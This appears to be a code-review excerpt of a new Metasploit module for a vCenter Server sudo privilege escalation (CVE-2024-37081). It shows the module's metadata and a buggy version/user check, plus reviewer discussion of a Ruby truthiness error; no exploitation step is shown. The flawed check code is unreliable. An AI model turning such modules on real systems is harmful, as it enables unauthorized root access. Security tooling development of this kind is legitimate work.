modules/exploits/linux/local/vcenter_sudo_lpe.rb

```diff
@@ -0,0 +1,148 @@
+      update_info(
+        info,
+        'Name' => 'vCenter Sudo Privilege Escalation',
+        'Description' => %q{
+          VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D
+          contains multiple local privilege escalation vulnerabilities
+          due to misconfiguration of sudo. An authenticated local user
+          with non-administrative privileges may exploit these issues
+          to elevate privileges to root on vCenter Server Appliance.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Matei "Mal" Badanoiu', # discovery
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [
+          [ 'Auto', {} ],
+        ],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453'],
+          [ 'URL', 'https://github.com/mbadanoiu/CVE-2024-37081/blob/main/VMware%20vCenter%20-%20CVE-2024-37081.pdf'],
+          [ 'CVE', '2024-37081']
+        ],
+        'DisclosureDate' => '2024-06-18',
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    vbuild = get_vcenter_build # VMware VirtualCenter 7.0.3 build-19480866
+    # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS
+    # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead
+    return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild
+    vbuild_version = Rex::Version.new("#{Regexp.last_match(0)}.#{Regexp.last_match(1)}")
+
+    return CheckCode::Safe("Version not vulnerable: #{vbuild}")  
+      unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d
+      (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) || # 7.0 u3r
+
+    vprint_good("Exploitable version detected: #{vbuild_version}")
+
+    user = cmd_exec('whoami').chomp
+    groups = cmd_exec('groups').split(' ').chomp
+    if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user ||
+      ['operator', 'admin'] & group
```

Comment:
The second part of this will always evaluate to true because empty arrays are truthy in Ruby. I think what you want is something like this instead:

```suggestion
    if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any?
```

Reply:
I believe I program in rubython, a mix of ruby and python depending how much switching i've been doing